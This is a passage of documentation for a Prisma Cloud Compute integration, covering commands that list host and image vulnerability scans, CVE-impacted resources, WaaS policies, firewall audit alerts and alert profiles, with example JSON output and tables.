"medium": 0,
"critical": 0,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"allCompliance": {},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "Alpine Linux v3.7",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": null,
"scanVersion": "21.04.439",
"type": "image",
"distro": "Alpine Linux v3.7",
"files": null,
"scanID": 0,
"osDistro": "alpine",
"tags": [
{
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
}
],
"Secrets": null,
"osDistroRelease": "3.7.0",
"topLayer": "sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6",
"osDistroVersion": "",
"trustStatus": "trusted",
"firstScanTime": "2021-09-02T11:05:27.439Z",
"_id": "image123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Critical severity": {},
"Medium severity": {},
"DoS": {}
},
"err": "",
"vulnerabilitiesCount": 60,
"scanTime": "2021-12-14T14:19:36.091Z",
"complianceIssuesCount": 1,
"creationTime": "2018-05-10T10:32:49.309Z",
"vulnerabilities": null,
"hosts": {
"host123": {
"modified": "2021-12-14T14:19:36.091Z"
}
},
"complianceRiskScore": 10000,
"wildFireUsage": null,
"binaries": null,
"vulnerabilityRiskScore": 12282000,
"history": null
}
}
}

Human Readable Output#

Image description#

IDImageOS DistributionVulnerabilities CountCompliance Issues Count
image123demisto/python:1.3-alpineAlpine Linux v3.7601

Vulnerability Statistics#

CriticalHighMediumLow
1228200

Compliance Statistics#

CriticalHighMediumLow
0100

prisma-cloud-compute-hosts-scan-list#


Get hosts scan report. The report includes vulnerabilities, compliance issues, binaries, etc.

Base Command#

prisma-cloud-compute-hosts-scan-list

Requires Role#

vulnerabilityManager

Input#

Argument NameDescriptionRequired
clustersA comma-separated list of cluster names to filter the results by.Optional
compactWhether only minimal image data is to be returned (i.e., skip vulnerabilities, compliance, and extended image metadata). Possible values are: true, false. Default is true.Optional
distroComma-separated list of operating system distros to filter the results by.Optional
fieldsComma-separated list of fields to return. Possible values are labels, repo, registry, clusters, hosts, tag.Optional
hostnameComma-separated list of hostnames to filter the results by. Can be retrieved from !prisma-cloud-compute-profile-host-list.Optional
providerComma-separated list of cloud providers to filter the results by.Optional
limit_recordThe maximum number of scan host records to return. Default is 10.Optional
limit_statsThe maximum number of compliance/vulnerability records to return. Default is 10.Optional
offsetThe offset by which to begin listing host scan results. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ReportHostScan._idStringThe host identifier (host ID or hostname).
PrismaCloudCompute.ReportHostScan.allComplianceUnknownData regarding passed compliance checks.
PrismaCloudCompute.ReportHostScan.appEmbeddedBooleanWhether this image was scanned by an app-embedded defender.
PrismaCloudCompute.ReportHostScan.applicationsUnknownProducts in the image.
PrismaCloudCompute.ReportHostScan.binariesUnknownBinaries in the image.
PrismaCloudCompute.ReportHostScan.cloudMetadataUnknownThe metadata for an instance running in a cloud provider (AWS/GCP/Azure).
PrismaCloudCompute.ReportHostScan.clustersStringCluster names.
PrismaCloudCompute.ReportHostScan.collectionsStringCollections to which this result applies.
PrismaCloudCompute.ReportHostScan.complianceDistributionUnknownThe number of vulnerabilities per type.
PrismaCloudCompute.ReportHostScan.complianceIssuesUnknownNumber of compliance issues.
PrismaCloudCompute.ReportHostScan.complianceRiskScoreNumberCompliance risk score for the image.
PrismaCloudCompute.ReportHostScan.creationTimeDateDate/time when the image was created.
PrismaCloudCompute.ReportHostScan.distroStringFull name of the distribution.
PrismaCloudCompute.ReportHostScan.ecsClusterNameStringElastic Container Service (ECS) cluster name.
PrismaCloudCompute.ReportHostScan.errStringDescription of an error that occurred during image health scan.
PrismaCloudCompute.ReportHostScan.externalLabelsUnknownKubernetes external labels of all containers running this image.
PrismaCloudCompute.ReportHostScan.firewallProtectionUnknownThe status of the Web-Application and API Security (WAAS) protection.
PrismaCloudCompute.ReportHostScan.firstScanTimeDateDate/time when this image was first scanned (preserved during version updates).
PrismaCloudCompute.ReportHostScan.historyUnknownDocker image history.
PrismaCloudCompute.ReportHostScan.hostDevicesStringMap from host network device name to IP address.
PrismaCloudCompute.ReportHostScan.hostnameStringName of the host that was scanned.
PrismaCloudCompute.ReportHostScan.hostsUnknownA fast index for image scan results metadata per host.
PrismaCloudCompute.ReportHostScan.imageUnknownA container image.
PrismaCloudCompute.ReportHostScan.installedProductsUnknownData regarding products running in the environment.
PrismaCloudCompute.ReportHostScan.instancesUnknownDetails about each occurrence of the image (tag + host).
PrismaCloudCompute.ReportHostScan.k8sClusterAddrStringEndpoint of the Kubernetes API server.
PrismaCloudCompute.ReportHostScan.namespacesStringKubernetes namespaces of all the containers running this image.
PrismaCloudCompute.ReportHostScan.osDistroStringName of the operating system distribution.
PrismaCloudCompute.ReportHostScan.osDistroReleaseStringOperating system distribution release.
PrismaCloudCompute.ReportHostScan.osDistroVersionStringOperating system distribution version.
PrismaCloudCompute.ReportHostScan.packageManagerBooleanWhether the package manager is installed for the operating system.
PrismaCloudCompute.ReportHostScan.packagesUnknownThe packages that exist in the image.
PrismaCloudCompute.ReportHostScan.repoDigestsStringDigests of the image. Used for content trust (notary). Has one digest per tag.
PrismaCloudCompute.ReportHostScan.repoTagUnknownAn image repository and its associated tag or registry digest.
PrismaCloudCompute.ReportHostScan.riskFactorsUnknownMaps the existence of vulnerability risk factors.
PrismaCloudCompute.ReportHostScan.scanIDStringScan ID.
PrismaCloudCompute.ReportHostScan.scanTimeDateDate/time of the last scan of the image.
PrismaCloudCompute.ReportHostScan.scanVersionStringDefender version that published the image.
PrismaCloudCompute.ReportHostScan.startupBinariesUnknownBinaries that are expected to run when the container is created from this image.
PrismaCloudCompute.ReportHostScan.tagsUnknownTags associated with the given image.
PrismaCloudCompute.ReportHostScan.topLayerStringSHA256 of the image's last layer that is the last element of the Layers field.
PrismaCloudCompute.ReportHostScan.trustStatusStringThe trust status for an image.
PrismaCloudCompute.ReportHostScan.typeUnknownThe scanning type performed.
PrismaCloudCompute.ReportHostScan.vulnerabilitiesUnknownCVE vulnerabilities of the host.
PrismaCloudCompute.ReportHostScan.vulnerabilitiesCountNumberTotal number of vulnerabilities.
PrismaCloudCompute.ReportHostScan.vulnerabilityDistributionUnknownThe number of vulnerabilities per type.
PrismaCloudCompute.ReportHostScan.vulnerabilityRiskScoreNumberImage's CVE risk score.
PrismaCloudCompute.ReportHostScan.wildFireUsageUnknownThe Wildfire usage stats. The period for the usage varies with the context.
PrismaCloudCompute.ReportHostScan.complianceIssuesCountUnknownNumber of compliance issues.

Command Example#

!prisma-cloud-compute-hosts-scan-list hostname=host123 compact=false limit_stats=2

Context Example#

{
"PrismaCloudCompute": {
"ReportHostScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "host123",
"vulnerabilityDistribution": {
"high": 4,
"total": 191,
"medium": 78,
"critical": 0,
"low": 109
},
"creationTime": "0001-01-01T00:00:00Z",
"image": {
"created": "0001-01-01T00:00:00Z"
},
"labels": [
"osDistro:ubuntu",
"osVersion:16.04"
],
"instances": [],
"complianceIssues": [
{
"templates": [
"GDPR"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 16,
"severity": "high",
"title": "(CIS_Docker_CE_v1.1.0 - 1.4) Only allow trusted users to control Docker daemon",
"packageVersion": "",
"cause": "1 users in docker group: demisto",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "Docker allows you to share a directory between the Docker host and a guest container\nwithout limiting the access rights of the container. This means that you can start a\ncontainer and map the / directory on your host to the container. The container will then be\nable to alter your host file system without any restrictions. In simple terms, it means that\nyou can attain elevated privileges with just being a member of the docker group and then\nstarting a container with mapped / directory on the host",
"link": "",
"cri": false,
"riskFactors": null,
"type": "host_config",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
},
{
"templates": [
"PCI",
"HIPAA"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 21,
"severity": "high",
"title": "(CIS_Docker_v1.2.0 - 2.1) Restrict network traffic between containers",
"packageVersion": "",
"cause": "",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "By default, all network traffic is allowed between containers on the same host on the\ndefault network bridge. If not desired, restrict all the inter-container communication. Link\nspecific containers together that require communication. Alternatively, you can create\ncustom network and only join containers that need to communicate to that custom\nnetwork",
"link": "",
"cri": false,
"riskFactors": null,
"type": "daemon_config",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
}
],
"repoTag": null,
"packageManager": true,
"repoDigests": [],
"allCompliance": {},
"packages": [
{
"pkgsType": "package",
"pkgs": [
{
"name": "kbd",
"version": "1.15.5-1ubuntu5",
"cveCount": 5,
"license": "GPL-2+",
"layerTime": 0
},
{
"name": "xdg-utils",
"version": "1.1.1-1ubuntu1.16.04.5",
"cveCount": 50,
"license": "",
"layerTime": 0
}
]
}
],
"complianceDistribution": {
"high": 16,
"total": 17,
"medium": 0,
"critical": 1,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "xenial",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": [],
"type": "host",
"distro": "Ubuntu 16.04.2 LTS",
"files": [],
"scanID": 0,
"osDistro": "ubuntu",
"tags": [],
"Secrets": [],
"applications": [
{
"knownVulnerabilities": 20,
"path": "",
"version": "17.06.0-ce",
"layerTime": 0,
"name": "docker"
}
],
"osDistroRelease": "xenial",
"osDistroVersion": "16.04",
"trustStatus": "",
"firstScanTime": "0001-01-01T00:00:00Z",
"_id": "host123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Exploit exists": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Medium severity": {},
"DoS": {},
"Package in use": {}
},
"err": "",
"vulnerabilitiesCount": 191,
"scanTime": "2021-12-15T14:19:48.792Z",
"complianceIssuesCount": 17,
"hostDevices": [
{
"ip": "1.1.1.1",
"name": "eth0"
}
],
"vulnerabilities": [
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"text": "",
"discovered": "2020-11-04T18:15:00Z",
"exploit": "",
"layerTime": 0,
"id": 46,
"applicableRules": [
"*"
],
"severity": "low",
"title": "",
"packageVersion": "4.9.3-0ubuntu0.16.04.1",
"cause": "",
"cvss": 7.5,
"status": "needed",
"twistlock": false,
"fixDate": "",
"description": "The ppp decapsulator in tcpdump 4.9.3 can be convinced to allocate a large amount of memory.",
"link": "https://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-8037",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {}
},
"type": "image",
"packageName": "tcpdump",
"functionLayer": "",
"published": 1604513700,
"cve": "CVE-2020-8037"
},
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"text": "",
"discovered": "2021-04-29T05:15:00Z",
"exploit": "",
"layerTime": 0,
"id": 46,
"applicableRules": [
"*"
],
"severity": "medium",
"title": "",
"packageVersion": "1.17.1-1ubuntu1.5",
"cause": "",
"cvss": 6.1,
"status": "deferred",
"twistlock": false,
"fixDate": "",
"description": "GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.",
"link": "https://people.canonical.com/~ubuntu-security/cve/2021/CVE-2021-31879",
"cri": false,
"riskFactors": {
"Medium severity": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {}
},
"type": "image",
"packageName": "wget",
"functionLayer": "",
"published": 1619673300,
"cve": "CVE-2021-31879"
}
],
"hosts": {},
"complianceRiskScore": 1160000,
"wildFireUsage": null,
"binaries": [
{
"services": [
"lxcfs"
],
"path": "/usr/bin/lxcfs",
"cveCount": 0,
"name": "lxcfs",
"md5": ""
},
{
"services": [
"systemd-udevd"
],
"path": "/lib/systemd/systemd-udevd",
"cveCount": 0,
"name": "systemd-udevd",
"md5": ""
}
],
"vulnerabilityRiskScore": 47909,
"history": []
}
}
}

Human Readable Output#

Host description#

HostnameDocker VersionOS DistributionVulnerabilities CountCompliance Issues Count
host12317.06.0-ceUbuntu 16.04.2 LTS19117

Vulnerabilities#

CveDescriptionSeverityPackage NameStatus
CVE-2020-8037The ppp decapsulator in tcpdump 4.9.3 can be convinced to allocate a large amount of memory.lowtcpdumpneeded
CVE-2021-31879GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.mediumwgetdeferred

Compliances#

IdSeverityDescription
16highDocker allows you to share a directory between the Docker host and a guest container
without limiting the access rights of the container. This means that you can start a
container and map the / directory on your host to the container. The container will then be
able to alter your host file system without any restrictions. In simple terms, it means that
you can attain elevated privileges with just being a member of the docker group and then
starting a container with mapped / directory on the host
21highBy default, all network traffic is allowed between containers on the same host on the
default network bridge. If not desired, restrict all the inter-container communication. Link
specific containers together that require communication. Alternatively, you can create
custom network and only join containers that need to communicate to that custom
network

Command Example#

!prisma-cloud-compute-hosts-scan-list hostname=host123 compact=true limit_stats=2

Context Example#

{
"PrismaCloudCompute": {
"ReportHostScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "host123",
"vulnerabilityDistribution": {
"high": 4,
"total": 191,
"medium": 78,
"critical": 0,
"low": 109
},
"creationTime": "0001-01-01T00:00:00Z",
"image": {
"created": "0001-01-01T00:00:00Z"
},
"labels": [
"osDistro:ubuntu",
"osVersion:16.04"
],
"instances": [],
"complianceIssues": null,
"repoTag": null,
"packageManager": false,
"repoDigests": [],
"allCompliance": {},
"packages": null,
"complianceDistribution": {
"high": 16,
"total": 17,
"medium": 0,
"critical": 1,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "xenial",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": null,
"type": "host",
"distro": "Ubuntu 16.04.2 LTS",
"files": null,
"scanID": 0,
"osDistro": "ubuntu",
"tags": [],
"Secrets": null,
"osDistroRelease": "xenial",
"osDistroVersion": "",
"trustStatus": "",
"firstScanTime": "0001-01-01T00:00:00Z",
"_id": "host123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Exploit exists": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Medium severity": {},
"DoS": {},
"Package in use": {}
},
"err": "",
"vulnerabilitiesCount": 191,
"scanTime": "2021-12-15T14:19:48.792Z",
"complianceIssuesCount": 17,
"hostDevices": [
{
"ip": "1.1.1.1",
"name": "eth0"
}
],
"vulnerabilities": null,
"hosts": {},
"complianceRiskScore": 1160000,
"wildFireUsage": null,
"binaries": null,
"vulnerabilityRiskScore": 47909,
"history": null
}
}
}

Human Readable Output#

Host description#

HostnameOS DistributionVulnerabilities CountCompliance Issues Count
host123Ubuntu 16.04.2 LTS19117

Vulnerability Statistics#

CriticalHighMediumLow
0478109

Compliance Statistics#

CriticalHighMediumLow
11600

prisma-cloud-compute-vulnerabilities-impacted-resources-list#


Get the list of Prisma Cloud Compute vulnerabilities resources.

Base Command#

prisma-cloud-compute-vulnerabilities-impacted-resources-list

Requires Role#

vulnerabilityManager

Input#

Argument NameDescriptionRequired
cveComma-separated list of CVEs IDs that can be used as a pivot for the impacted resource search. For example cve=CVE-2018-14600,CVE-2021-31535.Optional
limitThe maximum records of impacted hosts/images to return. Default is 50.Optional
offsetThe offset by which to begin listing impacted hosts/images records. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.VulnerabilitiesImpactedResource._idStringThe CVE ID. (The index for the impacted resources).
PrismaCloudCompute.VulnerabilitiesImpactedResource.functionsUnknownThe mapping between the function ID and its details.
PrismaCloudCompute.VulnerabilitiesImpactedResource.hostsStringThe list of impacted hosts.
PrismaCloudCompute.VulnerabilitiesImpactedResource.riskTreeUnknownThe risk tree associated with the CVE ID.

Command Example#

!prisma-cloud-compute-vulnerabilities-impacted-resources-list cve=CVE-2021-31535,CVE-2018-14600

Context Example#

{
"PrismaCloudCompute": {
"VulnerabilitiesImpactedResource": [
{
"_id": "CVE-2021-31535",
"hosts": [
"host1"
],
"riskTree": {
"sha256:c24dea8ef267038c3c1d64b66c7cd660df85563146af841c1b452b291093abdf": [
{
"image": "image1",
"factors": {}
}
],
"sha256:dccfc7e8628161ff6f859cb74aa9de07f1b2650554532b6103658d8831e6991f": [
{
"image": "image2",
"factors": {}
}
]
}
},
{
"_id": "CVE-2018-14600",
"riskTree": {
"sha256:c24dea8ef267038c3c1d64b66c7cd660df85563146af841c1b452b291093abdf": [
{
"image": "image3",
"factors": {}
}
],
"sha256:dccfc7e8628161ff6f859cb74aa9de07f1b2650554532b6103658d8831e6991f": [
{
"image": "image4",
"factors": {}
}
]
}
}
]
}
}

Human Readable Output#

Impacted Images#

CveImage
CVE-2021-31535image1
CVE-2021-31535image2
CVE-2018-14600image3
CVE-2018-14600image4

Impacted Hosts#

CveHostname
CVE-2021-31535host1

prisma-cloud-compute-get-waas-policies#


Get the Waas Container Policies from Defend >> WAAS >> Containers

Base Command#

prisma-cloud-compute-get-waas-policies

Input#

Argument NameDescriptionRequired

Context Output#

PathTypeDescription
PrismaCloudCompute.Policies.NameStringThe WaaS policy Name.
PrismaCloudCompute.Policies.WaasPolicy.ATPStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.CodeInjectionStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.SQLInjectionStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.DetectInformationLeakageStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.CrossSiteScriptingXSSStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.OSCommandInjetionStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.AttackToolsAndVulnScannersStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.LocalFileInclusionStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.ShellshockStringThe list of Waas Policies and there current setting.
PrismaCloudCompute.Policies.WaasPolicy.MalformedHTTPRequestStringThe list of Waas Policies and there current setting.

Command example#

!prisma-cloud-compute-get-waas-policies

Context Example#

{
"PrismaCloudCompute": {
"Policies": {
"Name": "dvwa",
"WaasPolicy": [
{
"ATP": "alert",
"AttackToolsAndVulnScanners": "alert",
"CodeInjection": "alert",
"CrossSiteScriptingXSS": "alert",
"DetectInformationLeakage": "alert",
"LocalFileInclusion": "alert",
"MalformedHTTPRequest": "alert",
"OSCommandInjetion": "alert",
"SQLInjection": "ban",
"Shellshock": "alert"
}
]
}
}
}

Human Readable Output#

dvwa#

ATPAttackToolsAndVulnScannersCodeInjectionCrossSiteScriptingXSSDetectInformationLeakageLocalFileInclusionMalformedHTTPRequestOSCommandInjetionSQLInjectionShellshock
alertalertalertalertalertalertalertalertbanalert

prisma-cloud-compute-update-waas-policies#


Update the Waas Policy for containers

Base Command#

prisma-cloud-compute-update-waas-policies

Input#

Argument NameDescriptionRequired
policyThe complete policy object. Get it by running prisma-cloud-compute-get-waas-policies raw-response=true extend-context=PCC=.Required
attack_typeThe specific policy to update. Possible values are: sqli, xss, cmdi, codeInjection, lfi, attackTools, shellshock, malformedReq, advancedProtectionEffect, intelGathering.Required
actionThe new policy action for the attack type. Possible values are: ban, prevent, alert, allow, disable, reCAPTCHA.Required
rule_nameThe rule name for the WaaS policy settings.Required

Context Output#

There is no context output for this command.

Human Readable Output#

Successfully updated the WaaS policy

prisma-cloud-compute-get-audit-firewall-container-alerts#


Get the audits for the firewall container policies

Base Command#

prisma-cloud-compute-get-audit-firewall-container-alerts

Input#

Argument NameDescriptionRequired
ImageNameThe image name to get the alerts for.Required
FromDaysThe Number of days back to look.Optional
audit_typeThe type of audit alert to retrieve.Required

Context Output#

There is no context output for this command.

Command example#

``!prisma-cloud-compute-get-audit-firewall-container-alerts audit_type=lfi ImageName=vulnerables/web-dvwa:latest````

Human Readable Output#

Audits#

No entries.

Known limitations:#

When fetching an incident from the Prisma Cloud Compute platform, the platform will delete the fetched incident. Therefore, it is recommended to configure only one instance per user to fetch incidents.

prisma-cloud-compute-get-alert-profiles#


Get the available alert alert profiles from a specific project.

Base Command#

prisma-cloud-compute-get-alert-profiles

Input#

Argument NameDescriptionRequired
projectThe project to get the alert profiles for.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.AlertProfiles.Cortex.ApplicationStringThe alert profile application.
PrismaCloudCompute.AlertProfiles.Cortex.CredentialIdStringThe credential ID.
PrismaCloudCompute.AlertProfiles.Cortex.EnabledBooleanWhether the alert profile is enabled.
PrismaCloudCompute.AlertProfiles.Cortex.UrlStringThe alert profile URL.
PrismaCloudCompute.AlertProfiles.Email.CredentialIdStringThe alert profile credential ID.
PrismaCloudCompute.AlertProfiles.Email.EnabledBooleanThe email setting for the alert profile.
PrismaCloudCompute.AlertProfiles.Email.FromStringThe from setting for the email profile.
PrismaCloudCompute.AlertProfiles.Email.PortNumberThe email alert profile port.
PrismaCloudCompute.AlertProfiles.Email.SmtpAddressStringThe SMTP address.
PrismaCloudCompute.AlertProfiles.Email.SslBooleanThe email alert profile SSL.
PrismaCloudCompute.AlertProfiles.GcpPubsub.CredentialIdStringThe credential ID.
PrismaCloudCompute.AlertProfiles.GcpPubsub.EnabledBooleanWhether the GCP Pub Sub is enabled.
PrismaCloudCompute.AlertProfiles.GcpPubsub.TopicStringThe GCP Pub Sub topic.
PrismaCloudCompute.AlertProfiles.Jira.BaseUrlStringThe Jira base URL.
PrismaCloudCompute.AlertProfiles.Jira.CaCertStringThe Jira CA Cert.
PrismaCloudCompute.AlertProfiles.Jira.CredentialIdStringThe Jira credential ID.
PrismaCloudCompute.AlertProfiles.Jira.EnabledBooleanJira alert profile status.
PrismaCloudCompute.AlertProfiles.Jira.IssueTypeStringThe Jira issue type.
PrismaCloudCompute.AlertProfiles.Jira.PriorityStringThe Jira priority.
PrismaCloudCompute.AlertProfiles.LastErrorStringThe last error.
PrismaCloudCompute.AlertProfiles.ModifiedDateThe modified time.
PrismaCloudCompute.AlertProfiles.NameStringThe alert profile name.
PrismaCloudCompute.AlertProfiles.OwnerStringThe alert profile owner.
PrismaCloudCompute.AlertProfiles.Pagerduty.RoutingKey.EncryptedStringThe PagerDuty routing key encryption status.
PrismaCloudCompute.AlertProfiles.Pagerduty.SeverityStringThe PagerDuty severity.
PrismaCloudCompute.AlertProfiles.Pagerduty.SummaryStringThe PagerDuty summary.
PrismaCloudCompute.AlertProfiles.Policy.Admission.AllRulesBooleanThe policy all rules.
PrismaCloudCompute.AlertProfiles.Policy.Admission.EnabledBooleanWhether the admission is enabled.
PrismaCloudCompute.AlertProfiles.Policy.AgentlessAppFirewall.AllRulesBooleanThe agentless app firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.AgentlessAppFirewall.EnabledBooleanWhether the agentless app firewall is enabled.
PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedAppFirewall.AllRulesBooleanApp embedded firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedAppFirewall.EnabledBooleanWhether the app embedded firewall is enabled.
PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedRuntime.AllRulesBooleanApp embedded runtime rules.
PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedRuntime.EnabledBooleanWhether the app embedded runtime is enabled.
PrismaCloudCompute.AlertProfiles.Policy.CloudDiscovery.AllRulesBooleanThe cloud discovery rules.
PrismaCloudCompute.AlertProfiles.Policy.CloudDiscovery.EnabledBooleanWhether the cloud discovery is enabled.
PrismaCloudCompute.AlertProfiles.Policy.CodeRepoVulnerability.AllRulesBooleanThe code repo vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.CodeRepoVulnerability.EnabledBooleanWhether the code repo vulnerability is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ContainerAppFirewall.AllRulesBooleanThe container app firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.ContainerAppFirewall.EnabledBooleanWhether the container app firewall is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ContainerCompliance.AllRulesBooleanThe container compliance rules.
PrismaCloudCompute.AlertProfiles.Policy.ContainerCompliance.EnabledBooleanWhether the container compliance is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ContainerComplianceScan.AllRulesBooleanThe container compliance scan rules.
PrismaCloudCompute.AlertProfiles.Policy.ContainerComplianceScan.EnabledBooleanWhether the container compliance scan is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ContainerRuntime.AllRulesBooleanThe container runtime rules.
PrismaCloudCompute.AlertProfiles.Policy.ContainerRuntime.EnabledBooleanWhether the container runtime is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ContainerVulnerability.AllRulesBooleanThe container vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.ContainerVulnerability.EnabledBooleanWhether the container vulnerability is enabled.
PrismaCloudCompute.AlertProfiles.Policy.Defender.AllRulesBooleanThe Defender policy rules.
PrismaCloudCompute.AlertProfiles.Policy.Defender.EnabledBooleanWhether the Defender policy is enabled.
PrismaCloudCompute.AlertProfiles.Policy.Docker.AllRulesBooleanThe Docker rules.
PrismaCloudCompute.AlertProfiles.Policy.Docker.EnabledBooleanWhether the Docker rules are enabled.
PrismaCloudCompute.AlertProfiles.Policy.HostAppFirewall.AllRulesBooleanThe app host firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.HostAppFirewall.EnabledBooleanWhether the host app firewall is enabled.
PrismaCloudCompute.AlertProfiles.Policy.HostCompliance.AllRulesBooleanThe host compliance rules.
PrismaCloudCompute.AlertProfiles.Policy.HostCompliance.EnabledBooleanWhether the host compliance is enabled.
PrismaCloudCompute.AlertProfiles.Policy.HostComplianceScan.AllRulesBooleanThe host compliance scan rules.
PrismaCloudCompute.AlertProfiles.Policy.HostComplianceScan.EnabledBooleanWhether the host compliance scan is enabled.
PrismaCloudCompute.AlertProfiles.Policy.HostRuntime.AllRulesBooleanThe host runtime rules.
PrismaCloudCompute.AlertProfiles.Policy.HostRuntime.EnabledBooleanWhether the host runtime rules are enabled.
PrismaCloudCompute.AlertProfiles.Policy.HostVulnerability.AllRulesBooleanThe host vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.HostVulnerability.EnabledBooleanWhether the host vulnerability rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.Incident.AllRulesBooleanThe policy incident rules.
PrismaCloudCompute.AlertProfiles.Policy.Incident.EnabledBooleanWhether the policy incident is enabled.
PrismaCloudCompute.AlertProfiles.Policy.KubernetesAudit.AllRulesBooleanThe K8S rules.
PrismaCloudCompute.AlertProfiles.Policy.KubernetesAudit.EnabledBooleanWhether K8S is enabled.
PrismaCloudCompute.AlertProfiles.Policy.NetworkFirewall.AllRulesBooleanThe network firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.NetworkFirewall.EnabledBooleanWhether the network firewall rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.RegistryVulnerability.AllRulesBooleanThe registry vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.RegistryVulnerability.EnabledBooleanWhether the registry vulnerability rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessAppFirewall.AllRulesBooleanThe servervless app firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessAppFirewall.EnabledBooleanWhether the serverless app firewall rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessRuntime.AllRulesBooleanThe serverless runtime rules.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessRuntime.EnabledBooleanWhether the serverless runtime rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.VmCompliance.AllRulesBooleanThe VM compliance rules.
PrismaCloudCompute.AlertProfiles.Policy.VmCompliance.EnabledBooleanWhether the VM compliance rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.VmVulnerability.AllRulesBooleanThe VM vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.VmVulnerability.EnabledBooleanWhether the VM vulnerability rules are enabled.
PrismaCloudCompute.AlertProfiles.Policy.WaasHealth.AllRulesBooleanThe WAAS health rules.
PrismaCloudCompute.AlertProfiles.Policy.WaasHealth.EnabledBooleanWhether the WAAS health rules are enabled.
PrismaCloudCompute.AlertProfiles.PreviousNameStringThe alert profile previous name.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.CredentialIDStringThe security advisor credential ID.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.EnabledBooleanWhether the security advisor is enabled.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.FindingsURLStringThe security advisor findings URL.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.ProviderIdStringThe security advisor provider ID.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.TokenURLStringThe security advisor token URL.
PrismaCloudCompute.AlertProfiles.SecurityCenter.CredentialIdStringThe security center crendential ID.
